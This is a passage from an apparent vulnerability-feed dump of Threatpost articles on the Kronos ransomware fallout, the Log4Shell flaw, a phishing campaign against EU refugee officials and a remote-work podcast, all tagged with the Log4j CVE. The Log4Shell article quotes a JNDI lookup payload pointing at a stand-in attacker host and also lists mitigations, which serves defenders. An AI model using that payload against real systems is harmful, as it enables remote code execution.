Source: Kronos Community Forum.\n\nThe subsequent lawsuits include a [class action](<https://www.classaction.org/news/new-york-mta-employees-owed-unpaid-overtime-following-kronos-data-breach-lawsuit-alleges>) filed by New York transit workers claiming that the Metropolitan Transportation Authority has \u201cfailed to pay certain employees any overtime wages since their payroll administrator was crippled by a December 2021 data breach.\u201d\n\nWorkers at Tesla and PepsiCo have also brought separate [lawsuits](<https://searchhrsoftware.techtarget.com/news/252512253/Tesla-PepsiCo-workers-bring-lawsuit-over-UKG-payroll-outage#:~:text=Lawsuits%20over%20the%20ransomware%20attack,inaccurate%20pay%20during%20the%20outage.&text=Two%20workers%2C%20one%20at%20Telsa%20Inc.&text=subsidiary%2C%20are%20suing%20the%20Ultimate,short%20of%20what%20they%20earned.>) over the UKG payroll outage, claiming that they received inaccurate pay during the outage.\n\nAs well, at the end of December, West Virginia\u2019s state auditor, J.B. McCuskey [promised](<https://wvmetronews.com/2021/12/31/mccuskey-promises-lawsuit-against-state-contractor-if-damages-for-payroll-problems-are-left-unpaid/>) that \u201cwe\u2019re going to hold Kronos accountable\u201d for what he called the \u201creal pain in the rear end\u201d of having to manually input information for more than 37,000 state employees before they got their first paychecks of 2022.\n\n020722 17:54 UPDATE: UKG didn\u2019t respond to Threatpost\u2019s inquiries regarding when it expects all of its systems to be fully restored. 
On Thursday evening, a company spokesperson pointed Threatpost to an [FAQ](<https://www.ukg.com/KPCupdates/kpc-faq>) that states that the company is working with Mandiant and West Monroe \u201cto test and continually harden our environment.\u201d\n\nThe company has identified \u201ca relatively small volume of data that was exfiltrated\u201d \u2013 data that included the personal details of two customers\u2019 employees. Both affected customers have been notified, it said.\n\nIn September, The Record [reported](<https://therecord.media/hackers-stole-puma-source-code-no-customer-data-company-says/>) that one of those customers was Puma, the sportswear manufacturer. The attackers stole source code, according to The Record. As of late August, they were trying to extort the company into paying ransom for it, threatening to release the files on a leak site if the German company didn\u2019t pay up.\n\n020822 10:44 UPDATE: The two incidents \u2013 Puma\u2019s September breach and the attack on UKG, which provides services to Puma \u2013 are unrelated, contrary to what Threatpost erroneously reported in an earlier update.\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/security/puma-hit-by-data-breach-after-kronos-ransomware-attack/>) reported on Monday after having dug up breach notification letters filed with several attorney generals\u2019 offices, the [breach notification](<https://apps.web.maine.gov/online/aeviewer/ME/40/10394643-6f4e-49ff-884a-9977602932a9.shtml>) UKG filed with the Office of the Maine Attorney General indicated that personal information belonging to Puma employees and their dependents was involved in the breach.\n\nPuma was one of two customers who had employee PII compromised as a result of that incident. 
Puma was a Kronos Private Cloud customer, and affected employees are in the process of being notified \u2013 hence the filing with the Maine AG\u2019s office.\n\nThat same letter said that data belonging to a total of 6,632 individuals were affected in the UKG breach, including SSNs.\n\n## Customers No Longer Using Pen and Paper\n\nUKG\u2019s core services were restored as of Jan. 22. That leaves \u201ccertain supplementary customer applications\u201d still to be restored. But at this point, customers are no longer using pen and paper for payroll, employee scheduling and other critical functions.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T23:08:49", "type": "threatpost", "title": "Kronos Still Dragging Itself Back From Ransomware Hell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T23:08:49", "id": 
"THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "href": "https://threatpost.com/kronos-dragging-itself-back-ransomware-hell/178213/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:11:40", "description": "An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s being exploited in the wild.\n\nThe flaw first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, on Thursday. The sites [reportedly](<https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/>) warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages.\n\nThe same day, the as-yet-unpatched flaw was dubbed \u201cLog4Shell\u201d by [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) and began being tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>).\n\nBy early Friday morning, the Cyber Emergency Response Team (CERT) of the Deutsche Telekom Group [tweeted](<https://twitter.com/DTCERT/status/1469258597930614787>) that it was seeing attacks on its honeypots coming from the Tor network as threat actors tried to exploit the new bug,\n\n> \ud83d\udea8\u26a0\ufe0fNew #0-day vulnerability tracked under \"Log4Shell\" and CVE-2021-44228 discovered in Apache Log4j \ud83c\udf36\ufe0f\u203c\ufe0f We are observing attacks in our honeypot infrastructure coming from the TOR network. 
Find Mitigation instructions here: <https://t.co/tUKJSn8RPF> [pic.twitter.com/WkAn911rZX](<https://t.co/WkAn911rZX>)\n> \n> \u2014 Deutsche Telekom CERT (@DTCERT) [December 10, 2021](<https://twitter.com/DTCERT/status/1469258597930614787?ref_src=twsrc%5Etfw>)\n\nDitto for [CERT New Zealand](<https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/>); and all day, people have piped up on Twitter to warn that they\u2019re also seeing in-the-wild exploits.\n\nThis problem is going to cause a mini-internet meltdown, experts said, given that Log4j is incorporated into scads of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. That exposes an eye-watering number of third-party apps that may also be vulnerable to the same type of high-severity exploits as that spotted in Minecraft, as well as in cloud services such as Steam and Apple iCloud, LunaSec warned.\n\nAs of Friday, version 2.15.0 had been released: log4j-core.jar is available on Maven Central [here](<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>), with release notes [available here](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0>) and Apache\u2019s Log4j security announcements [available here](<https://logging.apache.org/log4j/2.x/security.html>).\n\n## **\u2018Mini-Internet Meltdown\u2019 Imminent?**\n\nEven though an initial fix was rushed out on Friday, it\u2019s going to take time to trickle down to all of those projects, given how extensively the logging library is incorporated downstream.\n\n\u201cExpect a mini-internet meltdown soonish,\u201d said British security specialist Kevin Beaumont, who [tweeted](<https://twitter.com/GossiTheDog/status/1469255367049756676>) that the fix \u201cneeds to flow downstream to Apache Struts2, Solr, Linux distributions, vendors, appliances etc.\u201d\n\nJust one example of the bug\u2019s massive reach: On Friday morning, Rob Joyce, director of 
cybersecurity at the National Security Agency (NSA), [tweeted](<https://twitter.com/NSA_CSDirector/status/1469305071116636167>) that even the NSA\u2019s [GHIDRA](<https://ghidra-sre.org/>) \u2013 a suite of reverse-engineering tools developed by NSA\u2019s Research Directorate \u2013 includes the buggy Log4j library.\n\n> \u201cThe Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA\u2019s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.\u201d \u2014 _Rob Joyce, NSA Director of Cybersecurity._\n\n## Max CVSS Score of 10\n\nThe bug find has been credited to Chen Zhaojun of Alibaba. It\u2019s been assigned the [maximum CVSS score of 10](<https://logging.apache.org/log4j/2.x/security.html>), given how relatively easy it is to exploit, attackers\u2019 ability to seize control of targeted servers and the ubiquity of Log4j. According to CERT Austria, the security hole can be exploited by simply logging a special string.\n\nResearchers told Ars Technica that Log4Shell is a Java deserialization bug that stems from the library making network requests through the Java Naming and Directory Interface (JNDI) to an LDAP server and executing any code that\u2019s returned. It\u2019s reportedly triggered inside of log messages with use of the ${} syntax.\n\n\u201cJNDI triggers a look-up on a server controlled by the attacker and executes the returned code,\u201d according to CERT Austria\u2019s advisory, posted Friday, which noted that code for an exploit proof-of-concept (PoC) was [published on GitHub](<https://github.com/tangxiaofeng7/apache-log4j-poc>).\n\nThe internet\u2019s reaction: \u201cUmm, yikes.\u201d\n\n\u201cThis Log4j (CVE-2021-44228) vulnerability is extremely bad,\u201d [tweeted](<https://twitter.com/MalwareTechBlog/status/1469289471463944198>) security expert Marcus Hutchins. 
\u201cMillions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.\u201d\n\n## Javageddon\n\nSecurity researchers don\u2019t want to say that the sky is falling, per se, but, well, it is. They\u2019re comparing this scenario to Shellshock with regards to its huge potential severity. Aka [Bashdoor](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>), Shellshock was a family of security bugs in the Unix Bash [shell](<https://en.wikipedia.org/wiki/Shell_\\(computing\\)>) present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its initial disclosure in 2014, it was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning.\n\nSecurity researchers are considering Log4Shell to be much like Shellshock with regards to the enormous attack surface it poses. John Hammond, Senior Security Researcher at Huntress, who created [a PoC](<https://twitter.com/_JohnHammond/status/1469255402290401285>) for Log4Shell, predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data.\n\n\u201cOrganizations are already seeing signs of exploitation in the wild, and adversaries will just spray-and-pray across the internet,\u201d he told Threatpost via email on Friday. 
This isn\u2019t a targeted attack, he noted, given that \u201cthere is no target.\u201d\n\nHe recommended that organizations actively using Apache log4j \u201cabsolutely must upgrade to log4j-2.1.50-rc2 as soon as possible.\u201d\n\nHammond shared this [growing list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of software and components vulnerable to Log4Shell that\u2019s being cultivated on GitHub.\n\n## Affected Versions\n\nOn Thursday, [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) explained that affected versions are 2.0 <= Apache log4j <= 2.14.1.\n\nIt added that JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren\u2019t affected by the LDAP attack vector, given that in those versions, \u201ccom.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load a remote codebase using LDAP.\u201d\n\nVulnerability also depends on specific configurations. But there are \u201cother attack vectors targeting this vulnerability which can result in RCE,\u201d LunaSec continued. \u201cDepending on what code is present on the server, an attacker could leverage this existing code to execute a payload,\u201d pointing to a [Veracode post](<https://www.veracode.com/blog/research/exploiting-jndi-injections-java>) on an attack targeting the class org.apache.naming.factory.BeanFactory that\u2019s present on Apache Tomcat servers.\n\nLunaSec concluded that, \u201cgiven how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.\u201d\n\nOrganizations can tell if they\u2019re affected by examining log files for services using affected Log4j versions. 
If they contain user-controlled strings \u2013 CERT-NZ uses the example of \u201cJndi:ldap\u201d \u2013 they could be affected.\n\n\u201cIf you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,\u201d cybersecurity researchers at Randori [wrote in a blog post](<https://www.randori.com/blog/cve-2021-44228/>).\n\nChris Morgan, senior cyber threat intelligence analyst at Digital Shadows, noted that a workaround released to address the flaw, which comes as part of Log4j version 2.15.0, reportedly changes a system setting from \u201cfalse\u201d to \u201ctrue\u201d by default.\n\nDon\u2019t change that, he warned: users who change the setting back to \u201cfalse\u201d remain vulnerable to attack, and as a result, \u201cit is highly recommended that this is not returned to its previous setting,\u201d he told Threatpost on Friday. \u201cGiven the scale of affected devices and exploitability of the bug, it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors. 
Organizations are advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications.\u201d\n\n## Temporary Mitigation\n\nTo keep the library from being exploited, it\u2019s urgently recommended that Log4j versions are [upgraded](<https://logging.apache.org/log4j/2.x/security.html>) to log4j-2.15.0-rc1.\n\nBut for those who can\u2019t update straight off, LunaSec pointed to a [discussion on HackerNews](<https://news.ycombinator.com/item?id=29507263>) regarding a mitigation strategy available in version 2.10.0 and higher of Log4j that was posted in the early hours of Friday morning.\n\nFor versions older than 2.10.0 that can\u2019t be upgraded, these mitigation choices have been suggested:\n\n * Modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files ([here are Apache\u2019s details](<https://issues.apache.org/jira/browse/LOG4J2-2109>)); or,\n * Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application\u2019s or stack\u2019s classloading documentation to understand this behavior; or\n * Users should switch log4j2.formatMsgNoLookups to true by adding \u201c-Dlog4j2.formatMsgNoLookups=True\u201d to the JVM command for starting the application.\n\n## How the Vulnerability Works\n\nThe Huntress ThreatOps team has published [details](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>) on the vulnerability\u2019s impact and advice on what organizations should do next. Expect it and other reports to be updated as the situation unfolds.\n\nHuntress researchers said that the attack vector is \u201cextremely trivial\u201d for threat actors. 
As has been noted, it takes just a single text string to trigger an application to reach out to an external location if it\u2019s logged via the vulnerable instance of log4j.\n\nAs Hammond told Threatpost, a possible exploit could entail a threat actor supplying special text in an HTTP User-Agent header or a simple POST form request, with the usual form:\n\n${jndi:ldap://maliciousexternalhost.com/resource}\n\n\u2026where maliciousexternalhost.com is an instance controlled by the adversary.\n\nThe vulnerable log4j instance parses the input and reaches out to the malicious host via JNDI. \u201cThe first-stage resource acts as a springboard to another attacker-controlled endpoint, which serves Java code to be executed on the original victim,\u201d according to Huntress. \u201cUltimately, this grants the adversary the opportunity to run any code they would like on the target: remote code execution.\u201d\n\n## Stop, Drop, Hunt It Down\n\nSo much for baking Christmas cookies: It\u2019s going to be a long weekend for a lot of people, according to Casey Ellis, founder and CTO at Bugcrowd, who calls it \u201ca worst-case scenario.\u201d\n\n\u201cThe combination of log4j\u2019s ubiquitous use in software and platforms, the many, many paths available to exploit the vulnerability, the dependencies that will make patching this vulnerability without breaking other things difficult, and the fact that the exploit itself fits into a tweet,\u201d he told Threatpost on Friday via email.\n\nFirst things first, he said, \u201cstop what you\u2019re doing as a software shop and enumerate where log4j exists and might exist in your environment and products.\u201d\n\nHe noted that it\u2019s the kind of software \u201cthat can quite easily be there without making its presence obvious, so we expect the tail of exploitability on this vulnerability to be quite long.\u201d\n\nTim Wade, technical director of the CTO team at Vectra, told Threatpost that the specifics of how attacks will play out are 
\u201cstill a bit open-ended.\u201d But given the widespread use and position of the underlying software, he said, \u201cit absolutely looks like a good candidate for malicious network ingress, which means network defenders should be on guard for suspicious outbound traffic that may indicate command-and-control.\u201d\n\nWade said this is an example of how critical effective detection and response capabilities are, and \u201creally exposes how risky the \u2018prevent, patch, and pray\u2019 strategy that\u2019s so widely adopted in legacy security programs really is.\u201d\n\nJohn Bambenek, principal threat hunter at Netenrich, said that mitigations should be applied ASAP, including updating Java. He told Threatpost that Web application firewalls should also be updated with an appropriate rule to block such attacks.\n\n121021 15:57 UPDATE: Added input from John Hammond, John Bambenek, Tim Wade and Casey Ellis.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T17:58:04", "type": "threatpost", "title": "Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T17:58:04", "id": "THREATPOST:D098942E4435832E619282E1B92C9E0F", "href": 
"https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T17:21:25", "description": "Cyberattackers used a compromised Ukrainian military email address to phish EU government employees who\u2019ve been involved in managing the logistics of refugees fleeing Ukraine, according to a new [report](<https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails>).\n\nUkraine has been at the center of an unprecedented wave of cyberattacks in recent weeks and months, from distributed denial-of-service (DDoS) [campaigns](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against organizations and citizens to attacks against national [infrastructure](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) and more. This time, attackers went after aides in the EU, leveraging breaking news in the Russian invasion of Ukraine to entice targets into opening emails containing Microsoft Excel files laced with malware.\n\nResearchers attributed the phishing attempt to TA445 (aka UNC1151 or Ghostwriter). TA445 has previously been [linked](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) with the government of Belarus.\n\n## Attack Coincided with Russia\u2019s Invasion\n\nOn Wednesday, Feb. 23, NATO convened an [emergency meeting](<https://www.nato.int/cps/en/natohq/news_192406.htm>) regarding the impending Russian invasion of Ukraine.\n\nThe following day \u2013 the day Russia invaded Ukraine \u2013 researchers detected a suspicious email making the rounds. 
Its subject: \u201cIN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE SECURITY COUNCIL OF UKRAINE DATED 24.02.2022.\u201d It contained a macros-enabled Microsoft Excel (.xls) spreadsheet titled \u201clist of persons.xlsx\u201d that, when opened, delivered malware called SunSeed.\n\nThe email originated from a ukr.net address, which is a Ukrainian military email address. Oddly enough, the researchers were able to trace the address to a publicly available procurement document for a Stihl-brand lawn mower, purchased back in 2016. The order was made by \u201c\u0412\u0456\u0439\u0441\u044c\u043a\u043e\u0432\u0430 \u0447\u0430\u0441\u0442\u0438\u043d\u0430 \u04102622,\u201d a military unit based in Chernihiv, Ukraine. Exactly how the attackers obtained access to a military email address is not clear.\n\nThis phishing targeted a very specific group of European government personnel involved in managing the outflux of refugees from Ukraine. Though the targets \u201cpossessed a range of expertise and professional responsibilities,\u201d the report noted, \u201cthere was a clear preference for targeting individuals with responsibilities related to transportation, financial and budget allocation, administration, and population movement within Europe.\u201d\n\nThe goal in targeting these specific individuals was \u201cto gain intelligence regarding the logistics surrounding the movement of funds, supplies, and people within NATO member countries,\u201d according to the report.\n\n## Attackers Tied to Belarus, Russia by Extension\n\nThe report noted that no \u201cconcrete\u201d evidence can \u201cdefinitively\u201d tie this campaign to a particular threat actor. Still, the researchers noted a bevy of similarities between this phishing campaign and another campaign from July of last year that targeted U.S. 
cybersecurity and defense companies.\n\nThe July campaign \u201cutilized a highly similar macro-laden XLS attachment to deliver MSI packages that install a Lua malware script,\u201d according to Proofpoint researchers. Lua is the programming language in which SunSeed is coded. \u201cSimilarly, the campaign utilized a very recent government report as the basis of the social engineering content,\u201d they added.\n\nThe file name in that campaign \u2013 \u201clist of participants of the briefing.xls.\u201d \u2013 bears striking resemblance to the one used in this new campaign. Furthermore, \u201cthe Lua script created a nearly identical URI beacon to the SunSeed sample, which was composed of the infected victim\u2019s C Drive partition serial number. Analysis of the cryptography calls in both samples revealed that the same version of WiX 3.11.0.1528 had been utilized to create the MSI packages.\u201d\n\nThese overlaps allowed the researchers to conclude with moderate confidence that the two campaigns were perpetrated by the same threat actor: TA445. [According](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) to Mandiant, the group is based in Minsk, connected to the Belarusian military, and conducts its business in the interests of the Belarusian government. Belarus is a close ally of Russia.\n\nThe researchers concluded with a disclaimer. On balancing \u201cresponsible reporting with the quickest possible disclosure of actionable intelligence,\u201d they wrote, \u201cthe onset of hybrid conflict, including within the cyber domain, has accelerated the pace of operations and reduced the amount of time that defenders have to answer deeper questions around attribution and historical correlation to known nation-state operators.\u201d\n\n## Ukraine\u2019s Unprecedented Cyber Targeting\n\nThis phishing campaign isn\u2019t the worst Ukraine-oriented cyberattack in recent weeks, or even recent days. 
Still, the researchers noted that \u201cwhile the utilized techniques in this campaign are not groundbreaking individually, if deployed collectively, and during a high tempo conflict, they possess the capability to be quite effective.\u201d\n\nThomas Stoesser, of comforte AG, told Threatpost via email that this attack \u201cshows just how ruthless and clever threat actors can be in adapting existing social engineering tactics.\u201d\n\n\u201cThe situation underscores two key points that every enterprise should heed,\u201d he added. \u201cOne, it\u2019s not enough simply to educate employees sporadically about common social engineering tactics. [Companies] need to put a premium on employees treating every email with healthy skepticism. Two, protect all sensitive enterprise data with more than just perimeter security, even if you feel that the impenetrable vault you\u2019ve stored it all in is foolproof.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T17:18:44", "type": "threatpost", "title": "Phishing Campaign Targeted Those Aiding Ukraine Refugees", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T17:18:44", "id": "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "href": "https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T14:20:55", "description": "The baby upchucks. The dog loudly informs you that she\u2019s detected a budding squirrel armageddon. Your department\u2019s Zoom meeting starts in four minutes. The Bank of Fezziwig texts: If you haven\u2019t enabled online banking, click here.\n\nWhat. Do. You. DO?!?\n\nIt doesn\u2019t matter that you\u2019ve been working remotely since circa P.P. \u2013 that\u2019s Pre-Pandemic times. 
Now, your spouse is underfoot, your kids are bouncing off the walls of your quote-unquote office, you haven\u2019t had coffee, and you\u2019re pretty sure you don\u2019t even have an account at B of F, so you better just click that link and get the thing off your phone and out of your face.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nWrong answer! You\u2019ve been [smished](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>) by an attacker who sent a malicious link via SMS.\n\nTwo years into the pandemic, remote work has become common, but securing data is just as tough as it\u2019s always been. You don\u2019t have to look far to see tales of human error leading to cyber malfeasance: The human factor is at the base of most cyberattacks, from the employees who [fall for](<https://threatpost.com/bec-losses-top-18b/167148/>) business email compromise (BEC) attacks to whoever forgot to shut down that no-longer-used [VPN account](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>) that attackers used to launch the calamitous [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) ransomware attack.\n\nMark Loveless is a staff security researcher at GitLab, maker of the web-based Git repository. He\u2019s an expert at securing data when you\u2019ve got a remote, oftentimes frantically distracted workforce. 
After all, as GitLab [puts it](<https://about.gitlab.com/company/culture/all-remote/guide/>), it\u2019s \u201cone of the world\u2019s largest all-remote companies,\u201d with over 1,500 team members located in more than 65 countries around the world.\n\nMark visited the Threatpost podcast to give us an update on the world of remote work and to answer this question: Where are we now with data protection?\n\nCaution: If you\u2019re playing a drinking game based on how many times he\u2019ll say \u201c[Zero Trust](<https://threatpost.com/practical-guide-zero-trust-security/151912/>),\u201d stock the liquor cabinet before listening. Mark also cautioned that the dog might see a squirrel during our interview. It happens.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/022522_Mark_Loveless_GitLab_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T14:00:53", "type": "threatpost", "title": "Securing Data With a Frenzied Remote Workforce\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T14:00:53", "id": "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "href": "https://threatpost.com/securing-data-frenzied-remote-workforce-podcast/178742/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-15T20:03:19", "description": "Israel\u2019s National Cyber Directorate confirmed in a tweet on Monday that a denial-of-service (DDoS) attack against a telecommunications provider took down several government sites, as well as others not affiliated with the government. 
